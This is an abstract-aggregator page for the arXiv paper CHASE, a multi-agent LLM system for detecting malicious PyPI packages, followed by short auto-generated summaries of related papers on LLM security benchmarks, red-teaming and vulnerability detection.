Related papers: CHASE: LLM Agents for Dissecting Malicious PyPI Packages

CHASE: LLM Agents for Dissecting Malicious PyPI Packages

URL: http://arxiv.org/abs/2601.06838v1
Date: Sun, 11 Jan 2026 10:06:14 GMT
Title: CHASE: LLM Agents for Dissecting Malicious PyPI Packages
Authors: Takaaki Toda, Tatsuya Mori,
Abstract summary: Large Language Models (LLMs) offer promising capabilities for automated code analysis.<n>Their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion.<n>We present CHASE, a high-reliability multi-agent architecture that addresses these limitations.
Score: 2.384873896423002
License: http://arxiv.org/licenses/nonexclusive-distrib/1.0/
Abstract: Modern software package registries like PyPI have become critical infrastructure for software development, but are increasingly exploited by threat actors distributing malicious packages with sophisticated multi-stage attack chains. While Large Language Models (LLMs) offer promising capabilities for automated code analysis, their application to security-critical malware detection faces fundamental challenges, including hallucination and context confusion, which can lead to missed detections or false alarms. We present CHASE (Collaborative Hierarchical Agents for Security Exploration), a high-reliability multi-agent architecture that addresses these limitations through a Plan-and-Execute coordination model, specialized Worker Agents focused on specific analysis aspects, and integration with deterministic security tools for critical operations. Our key insight is that reliability in LLM-based security analysis emerges not from improving individual model capabilities but from architecting systems that compensate for LLM weaknesses while leveraging their semantic understanding strengths. Evaluation on a dataset of 3,000 packages (500 malicious, 2,500 benign) demonstrates that CHASE achieves 98.4% recall with only 0.08% false positive rate, while maintaining a practical median analysis time of 4.5 minutes per package, making it suitable for operational deployment in automated package screening. Furthermore, we conducted a survey with cybersecurity professionals to evaluate the generated analysis reports, identifying their key strengths and areas for improvement. This work provides a blueprint for building reliable AI-powered security tools that can scale with the growing complexity of modern software supply chains. Our project page is available at https://t0d4.github.io/CHASE-AIware25/

Related papers

LPS-Bench: Benchmarking Safety Awareness of Computer-Use Agents in Long-Horizon Planning under Benign and Adversarial Scenarios [51.52395368061729]
We present LPS-Bench, a benchmark that evaluates the planning-time safety awareness of MCP-based CUAs under long-horizon tasks.<n> Experiments reveal substantial deficiencies in existing CUAs' ability to maintain safe behavior.<n>We propose mitigation strategies to improve long-horizon planning safety in MCP-based CUA systems.
arXiv Detail & Related papers (2026-02-03T08:40:24Z)
Co-RedTeam: Orchestrated Security Discovery and Exploitation with LLM Agents [57.49020237126194]
Large language models (LLMs) have shown promise in assisting cybersecurity tasks, yet existing approaches struggle with automatic vulnerability discovery and exploitation.<n>We propose Co-RedTeam, a security-aware multi-agent framework designed to mirror real-world red-teaming.<n>Co-RedTeam decomposes vulnerability analysis into coordinated discovery and exploitation stages, enabling agents to plan, execute, validate, and refine actions.
arXiv Detail & Related papers (2026-02-02T14:38:45Z)
RealSec-bench: A Benchmark for Evaluating Secure Code Generation in Real-World Repositories [58.32028251925354]
Large Language Models (LLMs) have demonstrated remarkable capabilities in code generation, but their proficiency in producing secure code remains a critical, under-explored area.<n>We introduce RealSec-bench, a new benchmark for secure code generation meticulously constructed from real-world, high-risk Java repositories.
arXiv Detail & Related papers (2026-01-30T08:29:01Z)
Towards Verifiably Safe Tool Use for LLM Agents [53.55621104327779]
Large language model (LLM)-based AI agents extend capabilities by enabling access to tools such as data sources, APIs, search engines, code sandboxes, and even other agents.<n>LLMs may invoke unintended tool interactions and introduce risks, such as leaking sensitive data or overwriting critical records.<n>Current approaches to mitigate these risks, such as model-based safeguards, enhance agents' reliability but cannot guarantee system safety.
arXiv Detail & Related papers (2026-01-12T21:31:38Z)
Agentic AI for Autonomous Defense in Software Supply Chain Security: Beyond Provenance to Vulnerability Mitigation [0.0]
The current paper includes an example of agentic artificial intelligence (AI) based on autonomous software supply chain security.<n>It combines large language model (LLM)-based reasoning, reinforcement learning (RL), and multi-agent coordination.<n>Results show that agentic AI can facilitate the transition to self defending, proactive software supply chains.
arXiv Detail & Related papers (2025-12-29T14:06:09Z)
An Empirical Study on the Security Vulnerabilities of GPTs [48.12756684275687]
GPTs are one kind of customized AI agents based on OpenAI's large language models.<n>We present an empirical study on the security vulnerabilities of GPTs.
arXiv Detail & Related papers (2025-11-28T13:30:25Z)
ParaVul: A Parallel Large Language Model and Retrieval-Augmented Framework for Smart Contract Vulnerability Detection [43.41293570032631]
ParaVul is a retrieval-augmented framework to improve the reliability and accuracy of smart contract vulnerability detection.<n>We develop Sparse Low-Rank Adaptation (SLoRA) for LLM fine-tuning.<n>We construct a vulnerability contract dataset and develop a hybrid Retrieval-Augmented Generation (RAG) system.
arXiv Detail & Related papers (2025-10-20T03:23:41Z)
STAC: When Innocent Tools Form Dangerous Chains to Jailbreak LLM Agents [38.755035623707656]
This paper introduces Sequential Tool Attack Chaining (STAC), a novel multi-turn attack framework that exploits agent tool use.<n>We apply our framework to automatically generate and evaluate 483 STAC cases, featuring 1,352 sets of user-agent-environment interactions.<n>Our evaluations show that state-of-the-art LLM agents, including GPT-4.1, are highly vulnerable to STAC, with attack success rates (ASR) exceeding 90% in most cases.
arXiv Detail & Related papers (2025-09-30T00:31:44Z)
VulnRepairEval: An Exploit-Based Evaluation Framework for Assessing Large Language Model Vulnerability Repair Capabilities [41.85494398578654]
VulnRepairEval is an evaluation framework anchored in functional Proof-of-Concept exploits.<n>Our framework delivers a comprehensive, containerized evaluation pipeline that enables reproducible differential assessment.
arXiv Detail & Related papers (2025-09-03T14:06:10Z)
OpenAgentSafety: A Comprehensive Framework for Evaluating Real-World AI Agent Safety [58.201189860217724]
We introduce OpenAgentSafety, a comprehensive framework for evaluating agent behavior across eight critical risk categories.<n>Unlike prior work, our framework evaluates agents that interact with real tools, including web browsers, code execution environments, file systems, bash shells, and messaging platforms.<n>It combines rule-based analysis with LLM-as-judge assessments to detect both overt and subtle unsafe behaviors.
arXiv Detail & Related papers (2025-07-08T16:18:54Z)
Are AI-Generated Fixes Secure? Analyzing LLM and Agent Patches on SWE-bench [9.229310642804036]
We present the first large-scale security analysis of LLM-generated patches using 20,000+ issues from the SWE-bench dataset.<n>We evaluate patches produced by a standalone LLM (Llama 3.3) and compare them to developer-written patches.<n>We also assess the security of patches generated by three top-performing agentic frameworks (OpenHands, AutoCodeRover, HoneyComb) on a subset of our data.
arXiv Detail & Related papers (2025-06-30T21:10:19Z)
SEC-bench: Automated Benchmarking of LLM Agents on Real-World Software Security Tasks [11.861657542626219]
SEC-bench is the first fully automated benchmarking framework for evaluating large language model (LLM) agents.<n>Our framework automatically creates high-quality software vulnerability datasets with reproducible artifacts at a cost of only $0.87 per instance.<n>A comprehensive evaluation of state-of-the-art LLM code agents reveals significant performance gaps.
arXiv Detail & Related papers (2025-06-13T13:54:30Z)
CyberGym: Evaluating AI Agents' Real-World Cybersecurity Capabilities at Scale [45.97598662617568]
We introduce CyberGym, a large-scale benchmark featuring 1,507 real-world vulnerabilities across 188 software projects.<n>We show that CyberGym leads to the discovery of 35 zero-day vulnerabilities and 17 historically incomplete patches.<n>These results underscore that CyberGym is not only a robust benchmark for measuring AI's progress in cybersecurity but also a platform for creating direct, real-world security impact.
arXiv Detail & Related papers (2025-06-03T07:35:14Z)
Leveraging Large Language Models for Command Injection Vulnerability Analysis in Python: An Empirical Study on Popular Open-Source Projects [5.997074223480274]
Command injection vulnerabilities are a significant security threat in dynamic languages like Python.<n>With the proven effectiveness of Large Language Models (LLMs) in code-related tasks, such as testing, researchers have explored their potential for vulnerabilities analysis.<n>This study evaluates the potential of large language models (LLMs), such as GPT-4, as an alternative approach for automated testing for vulnerability detection.
arXiv Detail & Related papers (2025-05-21T04:14:35Z)
SeCodePLT: A Unified Platform for Evaluating the Security of Code GenAI [58.29510889419971]
Existing benchmarks for evaluating the security risks and capabilities of code-generating large language models (LLMs) face several key limitations.<n>We introduce a general and scalable benchmark construction framework that begins with manually validated, high-quality seed examples and expands them via targeted mutations.<n>Applying this framework to Python, C/C++, and Java, we build SeCodePLT, a dataset of more than 5.9k samples spanning 44 CWE-based risk categories and three security capabilities.
arXiv Detail & Related papers (2024-10-14T21:17:22Z)
IRIS: LLM-Assisted Static Analysis for Detecting Security Vulnerabilities [14.188864624736938]
Large language models (or LLMs) have shown impressive code generation capabilities but they cannot do complex reasoning over code to detect such vulnerabilities.<n>We propose IRIS, a neuro-symbolic approach that systematically combines LLMs with static analysis to perform whole-repository reasoning for security vulnerability detection.
arXiv Detail & Related papers (2024-05-27T14:53:35Z)
Large Language Models for Cyber Security: A Systematic Literature Review [17.073186844004148]
Large Language Models (LLMs) have opened up new opportunities for leveraging artificial intelligence in a variety of application domains, including cybersecurity.<n>LLMs are being applied to an expanding range of cybersecurity tasks, including vulnerability detection, malware analysis, and network intrusion detection.<n>A significant emerging trend is the use of LLM-based autonomous agents, which represent a paradigm shift from single-task execution to orchestrating complex, multi-step security.
arXiv Detail & Related papers (2024-05-08T02:09:17Z)

This list is automatically generated from the titles and abstracts of the papers in this site.